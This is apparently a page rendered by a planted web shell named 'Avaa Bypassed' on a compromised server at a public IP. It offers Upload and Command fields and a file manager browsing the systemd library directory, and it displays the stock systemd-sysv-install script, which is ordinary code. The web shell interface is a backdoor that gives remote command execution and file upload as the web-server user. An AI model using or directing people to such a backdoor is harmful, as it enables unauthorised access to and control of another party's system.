[ Avaa Bypassed ]




Upload:

Command:

www-data@18.216.70.76: ~ $
#!/bin/sh
# This script is called by "systemctl enable/disable" when the given unit is a
# SysV init.d script. It needs to call the distribution's mechanism for
# enabling/disabling those, such as chkconfig, update-rc.d, or similar. This
# can optionally take a --root argument for enabling a SysV init script
# in a chroot or similar.
set -eu

usage() {
    echo "Usage: $0 [--root=path] enable|disable|is-enabled <sysv script name>" >&2
    exit 1
}

ROOT=

# parse options
eval set -- "$(getopt -o r: --long root: -- "$@")"
while true; do
    case "$1" in
        -r|--root)
            ROOT="$2"
            shift 2 ;;
        --) shift ; break ;;
        *) usage ;;
    esac
done

NAME="${2:-}"

run() {
    if [ -n "$ROOT" ] && [ "$ROOT" != "/" ]; then
        _SKIP_SYSTEMD_NATIVE=1 chroot "$ROOT" /usr/sbin/update-rc.d "$@"
    else
        _SKIP_SYSTEMD_NATIVE=1 /usr/sbin/update-rc.d "$@"
    fi
}

[ -n "$NAME" ] || usage

case "$1" in
    enable)
        # call the command to enable SysV init script $NAME here..
        run "$NAME" defaults
        run "$NAME" enable
        ;;
    disable)
        run "$NAME" defaults
        run "$NAME" disable
        ;;
    is-enabled)
        # exit with 0 if $NAME is enabled, non-zero if it is disabled
        ls "$ROOT"/etc/rc[S5].d/S??"$NAME" >/dev/null 2>&1
        ;;
    *)
        usage ;;
esac

Filemanager

Name Type Size Permission Actions
boot Folder 0755
bootchart.conf.d Folder 0755
catalog Folder 0755
network Folder 0755
ntp-units.d Folder 0755
system Folder 0755
system-generators Folder 0755
system-preset Folder 0755
system-shutdown Folder 0755
system-sleep Folder 0755
user Folder 0755
user-environment-generators Folder 0755
user-generators Folder 0755
user-preset Folder 0755
libsystemd-shared-249.so File 2.71 MB 0644
resolv.conf File 710 B 0644
systemd File 1.76 MB 0755
systemd-ac-power File 14.37 KB 0755
systemd-backlight File 30.29 KB 0755
systemd-binfmt File 18.37 KB 0755
systemd-bless-boot File 30.47 KB 0755
systemd-boot-check-no-failures File 14.37 KB 0755
systemd-bootchart File 98.51 KB 0755
systemd-bootchart-poststop.sh File 897 B 0755
systemd-cgroups-agent File 14.29 KB 0755
systemd-cryptsetup File 58.55 KB 0755
systemd-fsck File 26.3 KB 0755
systemd-fsckd File 30.37 KB 0755
systemd-growfs File 22.37 KB 0755
systemd-hibernate-resume File 14.29 KB 0755
systemd-hostnamed File 42.39 KB 0755
systemd-initctl File 22.37 KB 0755
systemd-journald File 158.38 KB 0755
systemd-localed File 50.39 KB 0755
systemd-logind File 258.51 KB 0755
systemd-makefs File 14.29 KB 0755
systemd-modules-load File 18.47 KB 0755
systemd-network-generator File 34.37 KB 0755
systemd-networkd File 1.44 MB 0755
systemd-networkd-wait-online File 34.5 KB 0755
systemd-pstore File 22.39 KB 0755
systemd-quotacheck File 14.37 KB 0755
systemd-random-seed File 22.29 KB 0755
systemd-remount-fs File 14.29 KB 0755
systemd-reply-password File 14.29 KB 0755
systemd-resolved File 478.42 KB 0755
systemd-rfkill File 22.37 KB 0755
systemd-shutdown File 46.38 KB 0755
systemd-sleep File 26.37 KB 0755
systemd-socket-proxyd File 30.38 KB 0755
systemd-sulogin-shell File 14.29 KB 0755
systemd-sysctl File 22.47 KB 0755
systemd-sysv-install File 1.33 KB 0755
systemd-time-wait-sync File 14.29 KB 0755
systemd-timedated File 46.39 KB 0755
systemd-timesyncd File 54.22 KB 0755
systemd-udevd File 931.2 KB 0755
systemd-update-utmp File 18.37 KB 0755
systemd-user-runtime-dir File 22.29 KB 0755
systemd-user-sessions File 14.29 KB 0755
systemd-veritysetup File 22.4 KB 0755
systemd-volatile-root File 18.29 KB 0755
systemd-xdg-autostart-condition File 14.29 KB 0755